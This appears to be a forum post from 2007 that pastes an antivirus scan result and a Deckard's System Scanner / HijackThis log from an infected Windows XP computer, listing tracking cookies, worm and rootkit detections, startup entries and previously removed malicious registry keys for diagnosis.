Spyware:Cookie/Serving-sys Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.serving-sys.com/]
Spyware:Cookie/Serving-sys Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.bs.serving-sys.com/]
Spyware:Cookie/QuestionMarket Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.questionmarket.com/]
Spyware:Cookie/2o7 Not disinfected C:\Documents and Settings\Duane\Cookies\duane@2o7[1].txt
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Duane\Cookies\duane@atdmt[2].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Duane\Desktop\SDFix\apps\Process.exe
Virus:W32/Sdbot.ftp.worm Disinfected C:\Documents and Settings\Duane\Desktop\SDFix\backups\backups.zip[backups/i]
Virus:W32/Sdbot.ftp.worm Disinfected C:\Documents and Settings\Duane\Desktop\SDFix\backups_old1\backups.zip[backups/i]
Hacktool:Rootkit/Rustock Not disinfected C:\Documents and Settings\Duane\Desktop\SDFix\backups_old3\backups.zip[backups/lzx32.sys]
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Duane\Desktop\SDFix.exe[SDFix\apps\Process.exe]
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Duane\Desktop\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Duane\Desktop\VirtumundoBeGone.exe[²ƒÇ]
Potentially unwanted tool:Application/NirCmd.A Not disinfected C:\Documents and Settings\Duane\nircmd.exe
Spyware:Cookie/YieldManager Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[ad.yieldmanager.com/]
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.atdmt.com/]
Spyware:Cookie/Casalemedia Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.casalemedia.com/]
Spyware:Cookie/Tribalfusion Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.tribalfusion.com/]
Spyware:Cookie/BurstNet Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.burstnet.com/]
Spyware:Cookie/Doubleclick Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.doubleclick.net/]
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.fastclick.net/]
Spyware:Cookie/RealMedia Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.realmedia.com/]
Spyware:Cookie/BurstBeacon Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[www.burstbeacon.com/]
Spyware:Cookie/Hitbox Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.hitbox.com/]
Spyware:Cookie/Mediaplex Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.mediaplex.com/]
Spyware:Cookie/QuestionMarket Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.questionmarket.com/]
Spyware:Cookie/Searchportal Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.searchportal.information.com/]
Spyware:Cookie/Advertising Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.advertising.com/]
Spyware:Cookie/Adrevolver Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.adrevolver.com/]
Spyware:Cookie/Zedo Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.zedo.com/]
Spyware:Cookie/Server.iad.Liveperson Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[server.iad.liveperson.net/]
Spyware:Cookie/Server.iad.Liveperson Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[server.iad.liveperson.net/hc/15514262]
Spyware:Cookie/2o7 Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.2o7.net/]
Spyware:Cookie/Winantivirus Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[www.winantivirus.com/]
Spyware:Cookie/Traffic Marketplace Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.trafficmp.com/]
Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.overture.com/]
Spyware:Cookie/Azjmp Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.azjmp.com/]
Spyware:Cookie/PointRoll Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.ads.pointroll.com/]
Spyware:Cookie/Overture Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.perf.overture.com/]
Spyware:Cookie/Com.com Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.com.com/]
Spyware:Cookie/Falkag Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.as-eu.falkag.net/]
Spyware:Cookie/GoStats Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.gostats.com/]
Spyware:Cookie/Statcounter Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.statcounter.com/]
Spyware:Cookie/Reliablestats Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[stats1.reliablestats.com/]
Spyware:Cookie/WebtrendsLive Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[statse.webtrendslive.com/]
Spyware:Cookie/RealMedia Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.247realmedia.com/]
Spyware:Cookie/Systemdoctor Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[systemdoctor.com/]
Spyware:Cookie/Atwola Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.atwola.com/]
Spyware:Cookie/myaffiliateprogram Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.www.myaffiliateprogram.com/]
Spyware:Cookie/Linksynergy Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.linksynergy.com/]
Spyware:Cookie/Apmebf Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.apmebf.com/]
Spyware:Cookie/Valueclick Not disinfected C:\Documents and Settings\Molly\Application Data\Mozilla\Firefox\Profiles\ayzs70gt.default\cookies.txt[.valueclick.com/]
Spyware:Cookie/BurstNet Not disinfected C:\Documents and Settings\Others\Application Data\Mozilla\Firefox\Profiles\5rw0vw5m.default\cookies.txt[.burstnet.com/]
Spyware:Cookie/Com.com Not disinfected C:\Documents and Settings\Others\Application Data\Mozilla\Firefox\Profiles\5rw0vw5m.default\cookies.txt[.com.com/]
Potentially unwanted tool:Application/VSToolbar Not disinfected C:\Program Files\Hijack This\backups\backup-20070301-200021-574.dll
Potentially unwanted tool:Application/Processor Not disinfected C:\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\WINDOWS\system32\Process.exe

[color="SeaGreen"] Main.txt file[/COLOR]

Deckard's System Scanner v20070318.32
Run by Duane on 2007-03-21 at 21:15:08
Computer is in Normal Mode.
--------------------------------------------------------------------------------

-- System Restore --------------------------------------------------------------

Successfully created a Deckard's System Scanner Restore Point.

-- Last 5 Restore Point(s) --
93: 2007-03-22 04:15:13 UTC - RP311 - Deckard's System Scanner Restore Point
92: 2007-03-21 05:37:53 UTC - RP310 - System Checkpoint
91: 2007-03-20 04:34:08 UTC - RP309 - System Checkpoint
90: 2007-03-18 17:14:39 UTC - RP308 - System Checkpoint
89: 2007-03-17 16:28:22 UTC - RP307 - System Checkpoint

-- First Restore Point --
1: 2006-12-25 23:07:54 UTC - RP219 - System Checkpoint

Backed up registry hives.

Performed disk cleanup.

-- HijackThis (run as Duane.exe) -----------------------------------------------

Logfile of HijackThis v1.99.1
Scan saved at 9:15:46 PM, on 3/21/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb10.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe
C:\Program Files\Picasa2\PicasaMediaDetector.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Micro Innovations\Keyboard\kbdap32a.EXE
C:\Program Files\Micro Innovations\Mouse\mouse32a.exe
C:\Program Files\Java\jre1.6.0\bin\jusched.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\BigFix\BigFix.exe
C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\HP\hpcoretech\comp\hptskmgr.exe
C:\WINDOWS\wanmpsvc.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Documents and Settings\Duane\Desktop\dss.exe
C:\PROGRA~1\HIJACK~1\Duane.exe

R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.emachines.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {243B17DE-77C7-46BF-B94B-0B5F309A0E64} - C:\Program Files\Microsoft Money\System\mnyside.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SSC_UserPrompt] C:\Program Files\Common Files\Symantec Shared\Security Center\UsrPrmpt.exe
O4 - HKLM\..\Run: [Ulead AutoDetector] C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb10.exe
O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe"
O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [OFFICEKB] C:\Program Files\Micro Innovations\Keyboard\kbdap32a.EXE
O4 - HKLM\..\Run: [FLMOFFICE4DMOUSE] C:\Program Files\Micro Innovations\Mouse\mouse32a.exe
O4 - HKLM\..\Run: [PC Pitstop Optimize Scheduler] C:\Program Files\PCPitstop\Optimize\PCPOptimize.exe -boot
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0\bin\jusched.exe"
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Microsoft Works Update Detection] c:\Program Files\Microsoft Works\WkDetect.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: BigFix.lnk = C:\Program Files\BigFix\BigFix.exe
O4 - Global Startup: Ulead Photo Express 4.0 SE Calendar Checker .lnk = C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://c:\program files\google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://c:\program files\google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll
O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\ICQ.exe
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyside.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O14 - IERESET.INF: START_PAGE_URL=http://www.emachines.com
O16 - DPF: Video Poker - http://download.games.yahoo.com/game...s/y/vpt0_x.cab
O16 - DPF: Yahoo! Backgammon - http://download.games.yahoo.com/game...ts/y/at1_x.cab
O16 - DPF: Yahoo! Bingo - http://download.games.yahoo.com/game...ts/y/xt0_x.cab
O16 - DPF: Yahoo! Blackjack - http://download.games.yahoo.com/game...ts/y/jt0_x.cab
O16 - DPF: Yahoo! Checkers - http://download.games.yahoo.com/game...ts/y/kt4_x.cab
O16 - DPF: Yahoo! Chess - http://download.games.yahoo.com/game...ts/y/ct2_x.cab
O16 - DPF: Yahoo! Cribbage - http://download.games.yahoo.com/game...ts/y/it1_x.cab
O16 - DPF: Yahoo! Dice - http://download.games.yahoo.com/game...s/y/dct4_x.cab
O16 - DPF: Yahoo! Go Fish - http://download.games.yahoo.com/game...ts/y/zt3_x.cab
O16 - DPF: Yahoo! Klondike Solitaire - http://presence.games.yahoo.com/yog/y/ks12_x.cab
O16 - DPF: Yahoo! Poker - http://download.games.yahoo.com/game...ts/y/pt3_x.cab
O16 - DPF: Yahoo! Pyramids - http://download.games.yahoo.com/game...s/y/pyt1_x.cab
O16 - DPF: {01113300-3E00-11D2-8470-0060089874ED} (Support.com Configuration Class) - http://support.cox.com/sdccommon/download/tgctlcm.cab
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/viewers/ipixx.cab
O16 - DPF: {4620BC29-8B8E-4F4E-9D92-1DB6633D6793} (SurferNETWORK Plugin) - http://rd1.surfernetwork.com/surferplugin.ocx
O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} - http://software-dl.real.com/14939218...p/RdxIE601.cab
O16 - DPF: {62789780-B744-11D0-986B-00609731A21D} (Autodesk MapGuide ActiveX Control) - http://maricopa.gov/assessor/gis/plugin/mgaxctrl.cab
O16 - DPF: {7FE26BE2-B923-4B41-9834-E84DA1CC1F96} (Maid Control) - http://vsp.closetmaid.com/vsp/cmaidc...downloader.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/actives...ree/asinst.cab
O16 - DPF: {CC05BC12-2AA2-4AC7-AC81-0E40F83B1ADF} (Live365Player Class) - http://www.live365.com/players/play365.cab
O16 - DPF: {D77EF652-9A6B-40C8-A4B9-1C0697C6CF41} (TikGames Online Control) - http://download.games.yahoo.com/game.../gpcontrol.cab
O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - http://download.games.yahoo.com/game...ploader_v6.cab
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: SymWMI Service (SymWSC) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe
O23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - America Online, Inc. - C:\WINDOWS\wanmpsvc.exe

-- HijackThis Fixed Entries (C:\PROGRA~1\HIJACK~1\backups\) --------------------

backup-20070216-054427-128 O4 - HKLM\..\Run: [kdmmcvs] C:\WINDOWS\System32\gmonstml.exe
backup-20070216-054427-175 O4 - HKLM\..\Run: [nvcdllx] C:\WINDOWS\System32\cstatvmq.exe
backup-20070216-054427-288 O4 - HKCU\..\Run: [jmlcv4m] C:\WINDOWS\System32\mgcplwin.exe
backup-20070216-054427-352 O4 - HKCU\..\Run: [ymmsddlop] C:\WINDOWS\system32\vssmnptc.exe
backup-20070216-054427-370 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\iiydacla.dll",setvm
backup-20070216-054427-399 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
backup-20070216-054427-431 O4 - HKLM\..\Run: [Error Nuker] C:\Program Files\Error Nuker\bin\ErrorNuker.exe autostart
backup-20070216-054427-438 O4 - HKLM\..\Run: [lmjvservc] fxsugwhh.exe
backup-20070216-054427-566 O4 - HKLM\..\Run: [{7B-BE-E8-8B-ZN}] C:\windows\system32\nodsregj.exe SKY001
backup-20070216-054427-608 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = about:blank
backup-20070216-054427-619 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = file:///c:/secure32.html
backup-20070216-054427-624 O4 - HKCU\..\Run: [WinInit] "C:\DOCUME~1\Duane\LOCALS~1\Temp\162015.exe "
backup-20070216-054427-645 O4 - HKCU\..\Run: [cwingllib] C:\WINDOWS\system32\atllsimm.exe
backup-20070216-054427-684 O4 - HKLM\..\Run: [ExploreUpdSched] C:\WINDOWS\System32\qwinpoeb.exe SKY001
backup-20070216-054427-698 O4 - HKLM\..\Run: [ijciiqc.dll] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\ijciiqc.dll,okbblr
backup-20070216-054427-702 R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
backup-20070216-054427-794 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = about:blank
backup-20070216-054427-897 O4 - HKLM\..\Run: [AutoSys] C:\WINDOWS\System32\autosys.exe
backup-20070216-054427-929 O4 - HKCU\..\Run: [mdwinllm3] C:\WINDOWS\System32\sscmsslv.exe
backup-20070216-054428-100 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070216-054428-254 O4 - HKCU\..\Run: [ncsmmlg] C:\WINDOWS\System32\ctlmems.exe
backup-20070216-054428-293 O8 - Extra context menu item: &Search - http://edits.mywebsearch.com/toolbar...p=ZUxdm080YYUS
backup-20070216-054428-361 O4 - HKCU\..\Run: [csmhtop] C:\WINDOWS\System32\sdmmlmn.exe
backup-20070216-054428-368 O4 - HKCU\..\Run: [kdmmcvs] C:\WINDOWS\System32\gmonstml.exe
backup-20070216-054428-388 O23 - Service: WINS Client (RpcPatch) - Unknown owner - C:\WINDOWS\System32\wins\DLLHOST.EXE (file missing)
backup-20070216-054428-416 O23 - Service: Network Connections Sharing (RpcTftpd) - Unknown owner - C:\WINDOWS\System32\wins\svchost.exe (file missing)
backup-20070216-054428-503 O4 - HKCU\..\Run: [lsmdwinr] C:\WINDOWS\System32\vstldmem.exe
backup-20070216-054428-517 O16 - DPF: {2B96D5CC-C5B5-49A5-A69D-CC0A30F9028C} (MiniBugTransporterX Class) - http://wdownload.weatherbug.com/mini...ansporter.cab?
backup-20070216-054428-621 O4 - HKCU\..\Run: [winksddm] C:\WINDOWS\System32\jvmmods.exe
backup-20070216-054428-670 O4 - HKCU\..\Run: [lvcdmsys] C:\WINDOWS\System32\dbbsrcc.exe
backup-20070216-054428-692 O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
backup-20070216-054428-782 O4 - HKCU\..\Run: [ddsysmns] C:\WINDOWS\System32\scmdcon.exe
backup-20070216-054428-923 O4 - HKCU\..\Run: [nvcdllx] C:\WINDOWS\System32\cstatvmq.exe
backup-20070216-054428-976 O23 - Service: Microsoft authenticate service (MsaSvc) - Unknown owner - C:\WINDOWS\System32\msasvc.exe (file missing)
backup-20070216-054428-981 O4 - HKCU\..\Run: [gdxapimn] C:\WINDOWS\System32\jgdepgc.exe
backup-20070217-094852-237 O4 - HKLM\..\Run: [MyWebSearch Email Plugin] C:\PROGRA~1\MYWEBS~2\bar\1.bin\mwsoemon.exe
backup-20070217-094852-412 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-094852-445 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070217-094852-538 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\vpgvkoua.dll",setvm
backup-20070217-095341-714 O23 - Service: TCP and UDP Supp0rt - Unknown owner - C:\WINDOWS\System32\tccpip.exe (file missing)
backup-20070217-095341-913 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070217-095504-553 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070217-095630-934 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-095814-485 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-095845-703 O4 - HKLM\..\Run: [DllRunning] rundll32.exe "C:\WINDOWS\System32\etlcsjcc.dll",setvm
backup-20070217-105355-336 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-105355-357 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070217-110354-366 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070217-114409-294 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070217-114545-903 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070217-114616-441 O4 - HKLM\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070220-231401-253 O4 - Global Startup: .protected
backup-20070220-231401-880 O4 - Startup: .protected
backup-20070220-231401-900 O4 - HKCU\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070220-231411-468 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
backup-20070220-231411-583 O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
backup-20070220-231440-277 O4 - Startup: .protected
backup-20070220-231440-539 O4 - Global Startup: .protected
backup-20070221-190232-390 R3 - URLSearchHook: (no name) - {A8BD6820-6ED7-423E-9558-2D1486B0FEEA} - C:\Program Files\DeluxeCommunications\DxcBho.dll
backup-20070221-190232-606 O4 - Global Startup: .protected
backup-20070221-190232-680 O4 - Startup: .protected
backup-20070221-190232-900 O4 - HKCU\..\Run: [DeluxeCommunications] C:\Program Files\DeluxeCommunications\Dxc.exe
backup-20070221-190517-258 O23 - Service: Windows Host Services (DLLHOST32) - Unknown owner - C:\WINDOWS\system\dllhost.exe (file missing)
backup-20070221-190517-645 O23 - Service: Microsoft Apache for Windows (Windows Apache Service) - Unknown owner - C:\WINDOWS\wpablin.exe (file missing)
